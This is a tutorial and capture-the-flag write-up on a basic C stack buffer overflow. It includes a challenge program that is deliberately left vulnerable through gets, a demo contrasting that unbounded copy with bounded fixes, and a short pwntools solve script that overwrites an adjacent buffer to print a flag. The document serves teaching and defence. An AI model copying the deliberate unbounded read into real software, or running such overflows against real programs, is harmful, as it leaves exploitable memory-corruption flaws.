Basic Buffer Overflow

Description

Several C/C++ library functions write as much data as the caller supplies, with no knowledge of how large the destination buffer is, so oversized input overflows the allocated buffer.

Common examples include gets, memcpy, scanf and strcpy.

Through these functions, attacker-controlled input can clobber other variables that sit next to the buffer on the stack.

In the following example we use gets to overflow buffer1 and overwrite the buffer declared next to it.

Example

#include <stdio.h>
#include <string.h>
// gcc -g -o chal chal.c
// gets() was removed from the C11 standard, so newer gcc/glibc toolchains may
// need -std=gnu99 for it to be declared.

int main(void) {
    char buffer1[16];                       // destination of the unbounded read
    char buffer2[16] = "xxxxxxxxxxxxxxx";   // 15 'x' characters plus the terminating NUL

    gets(buffer1);                          // no length limit: input can run past buffer1

    if (strcmp(buffer2, "impossible?") == 0) {   // buffer2 is never written by the program itself
        puts("flag{win}");
    } else {
        puts("nope");
    }
    return 0;
}

Solution

Using the buffer overflow, we send input that writes past the allocated space for buffer1 and sets the contents of buffer2.

Since buffer2 sits directly after buffer1, we first send 16 bytes to fill buffer1 and then write impossible? so that it lands at the start of buffer2 (gets appends the terminating NUL for us), which makes the strcmp succeed and prints the flag.
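The description and the solution above both rest on one property: an unbounded write that starts at buffer1 continues straight into whatever is laid out after it. The following added example (written for this page, not part of the original challenge) makes that property deterministic by placing the two 16-byte buffers in a struct, so member order is guaranteed rather than left to the compiler's stack layout, and contrasts the unbounded copy with two bounded replacements: a length-checked copy and a fgets-based read_line that strips the newline and drains over-long lines. The struct frame, the function names and the payload string are assumptions of this example.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Two adjacent 16-byte buffers, mirroring the challenge's locals.  Putting
 * them in a struct fixes their order (C guarantees member order), so the demo
 * does not depend on how a particular compiler lays out stack variables. */
struct frame {
    char buffer1[16];
    char buffer2[16];
};

static const char INITIAL_BUFFER2[16] = "xxxxxxxxxxxxxxx";

static void frame_init(struct frame *f)
{
    memset(f->buffer1, 0, sizeof f->buffer1);
    memcpy(f->buffer2, INITIAL_BUFFER2, sizeof f->buffer2);
}

/* Models gets(): it knows where buffer1 starts but not where it ends, so the
 * copy runs straight into buffer2.  The only cap is the size of the whole
 * frame, which keeps this demonstration inside defined behaviour. */
static void unsafe_copy(struct frame *f, const char *input)
{
    size_t n = strlen(input) + 1;          /* gets() also writes the NUL */
    if (n > sizeof *f)
        n = sizeof *f;
    memcpy((char *)f + offsetof(struct frame, buffer1), input, n);
}

/* Bounded replacement: refuses input that does not fit, NUL included.
 * Returns 0 on success, -1 if the input was rejected (buffer1 untouched). */
static int safe_copy(struct frame *f, const char *input)
{
    size_t n = strlen(input);
    if (n >= sizeof f->buffer1)
        return -1;
    memcpy(f->buffer1, input, n + 1);
    return 0;
}

/* Drop-in for gets(): reads one line with fgets(), strips the newline and
 * discards the rest of an over-long line so it cannot leak into the next read.
 * Returns the stored length, or -1 if the line was truncated or absent. */
static int read_line(char *dst, size_t cap, FILE *in)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL) {
        if (cap)
            dst[0] = '\0';
        return -1;
    }
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';
        return (int)len;
    }
    /* No newline: either the final line without one, or the line exceeded cap-1. */
    int c = fgetc(in);
    if (c == EOF)
        return (int)len;
    while (c != '\n' && c != EOF)          /* drain the remainder of the long line */
        c = fgetc(in);
    return -1;
}

/* Returns 1 if buffer2 now holds the string the challenge compares against. */
static int buffer2_clobbered(const struct frame *f)
{
    return strcmp(f->buffer2, "impossible?") == 0;
}

int main(void)
{
    /* Constructed input: 16 filler bytes then the 11-byte target, as in the writeup. */
    const char *payload = "aaaaaaaaaaaaaaaaimpossible?";
    struct frame f;

    frame_init(&f);
    unsafe_copy(&f, payload);
    printf("unsafe_copy: buffer2=\"%s\" clobbered=%d\n", f.buffer2, buffer2_clobbered(&f));

    frame_init(&f);
    int rc = safe_copy(&f, payload);
    printf("safe_copy:   rc=%d buffer2=\"%s\" clobbered=%d\n", rc, f.buffer2, buffer2_clobbered(&f));

    char line[16];
    FILE *in = fmemopen((void *)payload, strlen(payload), "r");
    int n = read_line(line, sizeof line, in);
    fclose(in);
    printf("read_line:   n=%d line=\"%s\"\n", n, line);
    return 0;
}
```

Running it shows buffer2 turning into "impossible?" after unsafe_copy, staying untouched after safe_copy rejects the 27-byte input, and read_line keeping only the 15 bytes that fit while reporting the truncation. The design choice in read_line is to signal truncation explicitly rather than silently keep a prefix, so a caller can reject the request instead of acting on half of it.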

Solve Script

import pwn   # pwntools

p = pwn.process("./chal")

# 16 bytes fill buffer1; the next 11 bytes land in buffer2 and gets() adds the NUL.
p.sendline(b"a" * 16 + b"impossible?")
p.interactive()
